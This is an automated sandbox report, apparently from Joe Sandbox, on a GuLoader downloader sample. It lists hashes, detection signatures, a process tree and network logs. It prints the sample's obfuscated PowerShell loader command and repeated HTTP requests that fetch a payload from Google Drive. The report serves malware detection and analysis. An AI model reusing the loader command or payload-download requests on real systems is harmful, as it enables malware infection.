Edit tour

Windows Analysis Report
ro7eoySJ9q.exe

Overview

General Information

Sample name:	ro7eoySJ9q.exe renamed because original name is a hash value
Original sample name:	ebda1db301f4e3e3500292b8c519298d577cb9908b94f106a3cbe8c83136a423.exe
Analysis ID:	1588610
MD5:	69c59075bc9ffd11bf75080cfe44f29e
SHA1:	e1cb7f85eb9236fad345bc1e3f941219cdf84edc
SHA256:	ebda1db301f4e3e3500292b8c519298d577cb9908b94f106a3cbe8c83136a423
Tags:	exeGuLoadersigneduser-adrian__luca
Infos:

Detection

GuLoader

Score:	96
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Early bird code injection technique detected

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Yara detected GuLoader

AI detected suspicious sample

Found suspicious powershell code related to unpacking or dynamic code loading

Loading BitLocker PowerShell Module

Powershell drops PE file

Queues an APC in another process (thread injection)

Writes to foreign memory regions

Checks if the current process is being debugged

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to dynamically determine API calls

Contains functionality to shutdown / reboot the system

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE / OLE file has an invalid certificate

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Msiexec Initiated Connection

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

ro7eoySJ9q.exe (PID: 6732 cmdline: "C:\Users\user\Desktop\ro7eoySJ9q.exe" MD5: 69C59075BC9FFD11BF75080CFE44F29E)

powershell.exe (PID: 2572 cmdline: "powershell.exe" -windowstyle minimized "$Aichmophobia=Get-Content -Raw 'C:\Users\user\AppData\Roaming\Polysulfonate\sangersken\Karbonpapirs.Fis';$Referendumets=$Aichmophobia.SubString(72360,3);.$Referendumets($Aichmophobia)" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 7024 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

msiexec.exe (PID: 988 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
CloudEyE, GuLoader	CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.	No Attribution	http://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bluebottle-banks-targeted-africa https://0x00sec.org/t/analyzing-modern-malware-techniques-part-3/18943 https://any.run/cybersecurity-blog/deobfuscating-guloader/ https://asec.ahnlab.com/en/55978/ https://blog.checkpoint.com/security/march-2023s-most-wanted-malware-new-emotet-campaign-bypasses-microsoft-blocks-to-distribute-malicious-onenote-files/	https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000002.00000002.2832325462.000000000A25B000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
00000008.00000002.3416961233.0000000004BFB000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security

Sigma Signatures

System Summary

Sigma detected: Msiexec Initiated Connection

Source: Network Connection

Author: frack113: Data: DestinationIp: 216.58.206.78, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\msiexec.exe, Initiated: true, ProcessId: 988, Protocol: tcp, SourceIp: 192.168.2.6, SourceIsIpv6: false, SourcePort: 49985

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Source: File created

Author: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 2572, TargetFilename: C:\Users\user\AppData\Roaming\Polysulfonate\sangersken\ro7eoySJ9q.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell.exe" -windowstyle minimized "$Aichmophobia=Get-Content -Raw 'C:\Users\user\AppData\Roaming\Polysulfonate\sangersken\Karbonpapirs.Fis';$Referendumets=$Aichmophobia.SubString(72360,3);.$Referendumets($Aichmophobia)" , CommandLine: "powershell.exe" -windowstyle minimized "$Aichmophobia=Get-Content -Raw 'C:\Users\user\AppData\Roaming\Polysulfonate\sangersken\Karbonpapirs.Fis';$Referendumets=$Aichmophobia.SubString(72360,3);.$Referendumets($Aichmophobia)" , CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\ro7eoySJ9q.exe", ParentImage: C:\Users\user\Desktop\ro7eoySJ9q.exe, ParentProcessId: 6732, ParentProcessName: ro7eoySJ9q.exe, ProcessCommandLine: "powershell.exe" -windowstyle minimized "$Aichmophobia=Get-Content -Raw 'C:\Users\user\AppData\Roaming\Polysulfonate\sangersken\Karbonpapirs.Fis';$Referendumets=$Aichmophobia.SubString(72360,3);.$Referendumets($Aichmophobia)" , ProcessId: 2572, ProcessName: powershell.exe

Suricata Signatures

ETPRO MALWARE Common Downloader Header Pattern UHCa

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-11T03:08:50.343581+0100	2803270	2	Potentially Bad Traffic	192.168.2.6	49985	216.58.206.78	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Roaming\Polysulfonate\sangersken\ro7eoySJ9q.exe

ReversingLabs: Detection: 60%

Multi AV Scanner detection for submitted file

Source: ro7eoySJ9q.exe	ReversingLabs: Detection: 60%
Source: ro7eoySJ9q.exe	Virustotal: Detection: 72%			Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 88.3% probability

Source: ro7eoySJ9q.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 216.58.206.78:443 -> 192.168.2.6:49985 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.181.225:443 -> 192.168.2.6:49986 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.181.225:443 -> 192.168.2.6:49988 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 216.58.206.78:443 -> 192.168.2.6:49989 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 216.58.206.78:443 -> 192.168.2.6:49991 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.181.225:443 -> 192.168.2.6:49997 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 216.58.206.78:443 -> 192.168.2.6:49998 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 216.58.206.78:443 -> 192.168.2.6:50000 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 216.58.206.78:443 -> 192.168.2.6:50002 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 216.58.206.78:443 -> 192.168.2.6:50006 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 216.58.206.78:443 -> 192.168.2.6:50008 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 216.58.206.78:443 -> 192.168.2.6:50010 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 216.58.206.78:443 -> 192.168.2.6:50012 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 216.58.206.78:443 -> 192.168.2.6:50014 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 216.58.206.78:443 -> 192.168.2.6:50016 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 216.58.206.78:443 -> 192.168.2.6:50018 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 216.58.206.78:443 -> 192.168.2.6:50020 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 216.58.206.78:443 -> 192.168.2.6:50022 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 216.58.206.78:443 -> 192.168.2.6:50024 version: TLS 1.2

Source:	Binary string: indows\System.Core.pdb source: powershell.exe, 00000002.00000002.2825974414.0000000008771000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: CallSite.Targetore.pdbr source: powershell.exe, 00000002.00000002.2825974414.0000000008757000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \System.Core.pdbi$S source: powershell.exe, 00000002.00000002.2825974414.0000000008771000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\ro7eoySJ9q.exe	Code function: 0_2_004055D5 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	0_2_004055D5
Source: C:\Users\user\Desktop\ro7eoySJ9q.exe	Code function: 0_2_00406089 FindFirstFileW,FindClose,	0_2_00406089
Source: C:\Users\user\Desktop\ro7eoySJ9q.exe	Code function: 0_2_00402706 FindFirstFileW,	0_2_00402706

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: Network traffic

Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.6:49985 -> 216.58.206.78:443

Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /download?id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=iJBwBPcvZYdj_hp1mHHUxyQoU_0YxwGH9aAMpwMpn8Y55auLwhYKEZuTQe2O_-bxgzO4JL8YmgroC791NF6DDRSNGCaPfz6WS_XYw4PKfZjX0cfwtuxt4e9kBZfE_kvV4j0RYkFXCqKaw5GWgs5d02o2wLUA5v_cENQYddWxAMont6XGnmHY7fU
Source: global traffic	HTTP traffic detected: GET /download?id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=iJBwBPcvZYdj_hp1mHHUxyQoU_0YxwGH9aAMpwMpn8Y55auLwhYKEZuTQe2O_-bxgzO4JL8YmgroC791NF6DDRSNGCaPfz6WS_XYw4PKfZjX0cfwtuxt4e9kBZfE_kvV4j0RYkFXCqKaw5GWgs5d02o2wLUA5v_cENQYddWxAMont6XGnmHY7fU
Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=iJBwBPcvZYdj_hp1mHHUxyQoU_0YxwGH9aAMpwMpn8Y55auLwhYKEZuTQe2O_-bxgzO4JL8YmgroC791NF6DDRSNGCaPfz6WS_XYw4PKfZjX0cfwtuxt4e9kBZfE_kvV4j0RYkFXCqKaw5GWgs5d02o2wLUA5v_cENQYddWxAMont6XGnmHY7fU
Source: global traffic	HTTP traffic detected: GET /download?id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=iJBwBPcvZYdj_hp1mHHUxyQoU_0YxwGH9aAMpwMpn8Y55auLwhYKEZuTQe2O_-bxgzO4JL8YmgroC791NF6DDRSNGCaPfz6WS_XYw4PKfZjX0cfwtuxt4e9kBZfE_kvV4j0RYkFXCqKaw5GWgs5d02o2wLUA5v_cENQYddWxAMont6XGnmHY7fU
Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=iJBwBPcvZYdj_hp1mHHUxyQoU_0YxwGH9aAMpwMpn8Y55auLwhYKEZuTQe2O_-bxgzO4JL8YmgroC791NF6DDRSNGCaPfz6WS_XYw4PKfZjX0cfwtuxt4e9kBZfE_kvV4j0RYkFXCqKaw5GWgs5d02o2wLUA5v_cENQYddWxAMont6XGnmHY7fU
Source: global traffic	HTTP traffic detected: GET /download?id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=iJBwBPcvZYdj_hp1mHHUxyQoU_0YxwGH9aAMpwMpn8Y55auLwhYKEZuTQe2O_-bxgzO4JL8YmgroC791NF6DDRSNGCaPfz6WS_XYw4PKfZjX0cfwtuxt4e9kBZfE_kvV4j0RYkFXCqKaw5GWgs5d02o2wLUA5v_cENQYddWxAMont6XGnmHY7fU
Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=iJBwBPcvZYdj_hp1mHHUxyQoU_0YxwGH9aAMpwMpn8Y55auLwhYKEZuTQe2O_-bxgzO4JL8YmgroC791NF6DDRSNGCaPfz6WS_XYw4PKfZjX0cfwtuxt4e9kBZfE_kvV4j0RYkFXCqKaw5GWgs5d02o2wLUA5v_cENQYddWxAMont6XGnmHY7fU
Source: global traffic	HTTP traffic detected: GET /download?id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=iJBwBPcvZYdj_hp1mHHUxyQoU_0YxwGH9aAMpwMpn8Y55auLwhYKEZuTQe2O_-bxgzO4JL8YmgroC791NF6DDRSNGCaPfz6WS_XYw4PKfZjX0cfwtuxt4e9kBZfE_kvV4j0RYkFXCqKaw5GWgs5d02o2wLUA5v_cENQYddWxAMont6XGnmHY7fU
Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=iJBwBPcvZYdj_hp1mHHUxyQoU_0YxwGH9aAMpwMpn8Y55auLwhYKEZuTQe2O_-bxgzO4JL8YmgroC791NF6DDRSNGCaPfz6WS_XYw4PKfZjX0cfwtuxt4e9kBZfE_kvV4j0RYkFXCqKaw5GWgs5d02o2wLUA5v_cENQYddWxAMont6XGnmHY7fU
Source: global traffic	HTTP traffic detected: GET /download?id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=iJBwBPcvZYdj_hp1mHHUxyQoU_0YxwGH9aAMpwMpn8Y55auLwhYKEZuTQe2O_-bxgzO4JL8YmgroC791NF6DDRSNGCaPfz6WS_XYw4PKfZjX0cfwtuxt4e9kBZfE_kvV4j0RYkFXCqKaw5GWgs5d02o2wLUA5v_cENQYddWxAMont6XGnmHY7fU
Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=iJBwBPcvZYdj_hp1mHHUxyQoU_0YxwGH9aAMpwMpn8Y55auLwhYKEZuTQe2O_-bxgzO4JL8YmgroC791NF6DDRSNGCaPfz6WS_XYw4PKfZjX0cfwtuxt4e9kBZfE_kvV4j0RYkFXCqKaw5GWgs5d02o2wLUA5v_cENQYddWxAMont6XGnmHY7fU
Source: global traffic	HTTP traffic detected: GET /download?id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=iJBwBPcvZYdj_hp1mHHUxyQoU_0YxwGH9aAMpwMpn8Y55auLwhYKEZuTQe2O_-bxgzO4JL8YmgroC791NF6DDRSNGCaPfz6WS_XYw4PKfZjX0cfwtuxt4e9kBZfE_kvV4j0RYkFXCqKaw5GWgs5d02o2wLUA5v_cENQYddWxAMont6XGnmHY7fU
Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=iJBwBPcvZYdj_hp1mHHUxyQoU_0YxwGH9aAMpwMpn8Y55auLwhYKEZuTQe2O_-bxgzO4JL8YmgroC791NF6DDRSNGCaPfz6WS_XYw4PKfZjX0cfwtuxt4e9kBZfE_kvV4j0RYkFXCqKaw5GWgs5d02o2wLUA5v_cENQYddWxAMont6XGnmHY7fU
Source: global traffic	HTTP traffic detected: GET /download?id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=iJBwBPcvZYdj_hp1mHHUxyQoU_0YxwGH9aAMpwMpn8Y55auLwhYKEZuTQe2O_-bxgzO4JL8YmgroC791NF6DDRSNGCaPfz6WS_XYw4PKfZjX0cfwtuxt4e9kBZfE_kvV4j0RYkFXCqKaw5GWgs5d02o2wLUA5v_cENQYddWxAMont6XGnmHY7fU
Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=iJBwBPcvZYdj_hp1mHHUxyQoU_0YxwGH9aAMpwMpn8Y55auLwhYKEZuTQe2O_-bxgzO4JL8YmgroC791NF6DDRSNGCaPfz6WS_XYw4PKfZjX0cfwtuxt4e9kBZfE_kvV4j0RYkFXCqKaw5GWgs5d02o2wLUA5v_cENQYddWxAMont6XGnmHY7fU
Source: global traffic	HTTP traffic detected: GET /download?id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=iJBwBPcvZYdj_hp1mHHUxyQoU_0YxwGH9aAMpwMpn8Y55auLwhYKEZuTQe2O_-bxgzO4JL8YmgroC791NF6DDRSNGCaPfz6WS_XYw4PKfZjX0cfwtuxt4e9kBZfE_kvV4j0RYkFXCqKaw5GWgs5d02o2wLUA5v_cENQYddWxAMont6XGnmHY7fU
Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=iJBwBPcvZYdj_hp1mHHUxyQoU_0YxwGH9aAMpwMpn8Y55auLwhYKEZuTQe2O_-bxgzO4JL8YmgroC791NF6DDRSNGCaPfz6WS_XYw4PKfZjX0cfwtuxt4e9kBZfE_kvV4j0RYkFXCqKaw5GWgs5d02o2wLUA5v_cENQYddWxAMont6XGnmHY7fU
Source: global traffic	HTTP traffic detected: GET /download?id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=iJBwBPcvZYdj_hp1mHHUxyQoU_0YxwGH9aAMpwMpn8Y55auLwhYKEZuTQe2O_-bxgzO4JL8YmgroC791NF6DDRSNGCaPfz6WS_XYw4PKfZjX0cfwtuxt4e9kBZfE_kvV4j0RYkFXCqKaw5GWgs5d02o2wLUA5v_cENQYddWxAMont6XGnmHY7fU
Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=iJBwBPcvZYdj_hp1mHHUxyQoU_0YxwGH9aAMpwMpn8Y55auLwhYKEZuTQe2O_-bxgzO4JL8YmgroC791NF6DDRSNGCaPfz6WS_XYw4PKfZjX0cfwtuxt4e9kBZfE_kvV4j0RYkFXCqKaw5GWgs5d02o2wLUA5v_cENQYddWxAMont6XGnmHY7fU
Source: global traffic	HTTP traffic detected: GET /download?id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=iJBwBPcvZYdj_hp1mHHUxyQoU_0YxwGH9aAMpwMpn8Y55auLwhYKEZuTQe2O_-bxgzO4JL8YmgroC791NF6DDRSNGCaPfz6WS_XYw4PKfZjX0cfwtuxt4e9kBZfE_kvV4j0RYkFXCqKaw5GWgs5d02o2wLUA5v_cENQYddWxAMont6XGnmHY7fU
Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=iJBwBPcvZYdj_hp1mHHUxyQoU_0YxwGH9aAMpwMpn8Y55auLwhYKEZuTQe2O_-bxgzO4JL8YmgroC791NF6DDRSNGCaPfz6WS_XYw4PKfZjX0cfwtuxt4e9kBZfE_kvV4j0RYkFXCqKaw5GWgs5d02o2wLUA5v_cENQYddWxAMont6XGnmHY7fU
Source: global traffic	HTTP traffic detected: GET /download?id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=iJBwBPcvZYdj_hp1mHHUxyQoU_0YxwGH9aAMpwMpn8Y55auLwhYKEZuTQe2O_-bxgzO4JL8YmgroC791NF6DDRSNGCaPfz6WS_XYw4PKfZjX0cfwtuxt4e9kBZfE_kvV4j0RYkFXCqKaw5GWgs5d02o2wLUA5v_cENQYddWxAMont6XGnmHY7fU
Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=iJBwBPcvZYdj_hp1mHHUxyQoU_0YxwGH9aAMpwMpn8Y55auLwhYKEZuTQe2O_-bxgzO4JL8YmgroC791NF6DDRSNGCaPfz6WS_XYw4PKfZjX0cfwtuxt4e9kBZfE_kvV4j0RYkFXCqKaw5GWgs5d02o2wLUA5v_cENQYddWxAMont6XGnmHY7fU
Source: global traffic	HTTP traffic detected: GET /download?id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=iJBwBPcvZYdj_hp1mHHUxyQoU_0YxwGH9aAMpwMpn8Y55auLwhYKEZuTQe2O_-bxgzO4JL8YmgroC791NF6DDRSNGCaPfz6WS_XYw4PKfZjX0cfwtuxt4e9kBZfE_kvV4j0RYkFXCqKaw5GWgs5d02o2wLUA5v_cENQYddWxAMont6XGnmHY7fU
Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=iJBwBPcvZYdj_hp1mHHUxyQoU_0YxwGH9aAMpwMpn8Y55auLwhYKEZuTQe2O_-bxgzO4JL8YmgroC791NF6DDRSNGCaPfz6WS_XYw4PKfZjX0cfwtuxt4e9kBZfE_kvV4j0RYkFXCqKaw5GWgs5d02o2wLUA5v_cENQYddWxAMont6XGnmHY7fU
Source: global traffic	HTTP traffic detected: GET /download?id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=iJBwBPcvZYdj_hp1mHHUxyQoU_0YxwGH9aAMpwMpn8Y55auLwhYKEZuTQe2O_-bxgzO4JL8YmgroC791NF6DDRSNGCaPfz6WS_XYw4PKfZjX0cfwtuxt4e9kBZfE_kvV4j0RYkFXCqKaw5GWgs5d02o2wLUA5v_cENQYddWxAMont6XGnmHY7fU
Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=iJBwBPcvZYdj_hp1mHHUxyQoU_0YxwGH9aAMpwMpn8Y55auLwhYKEZuTQe2O_-bxgzO4JL8YmgroC791NF6DDRSNGCaPfz6WS_XYw4PKfZjX0cfwtuxt4e9kBZfE_kvV4j0RYkFXCqKaw5GWgs5d02o2wLUA5v_cENQYddWxAMont6XGnmHY7fU
Source: global traffic	HTTP traffic detected: GET /download?id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=iJBwBPcvZYdj_hp1mHHUxyQoU_0YxwGH9aAMpwMpn8Y55auLwhYKEZuTQe2O_-bxgzO4JL8YmgroC791NF6DDRSNGCaPfz6WS_XYw4PKfZjX0cfwtuxt4e9kBZfE_kvV4j0RYkFXCqKaw5GWgs5d02o2wLUA5v_cENQYddWxAMont6XGnmHY7fU
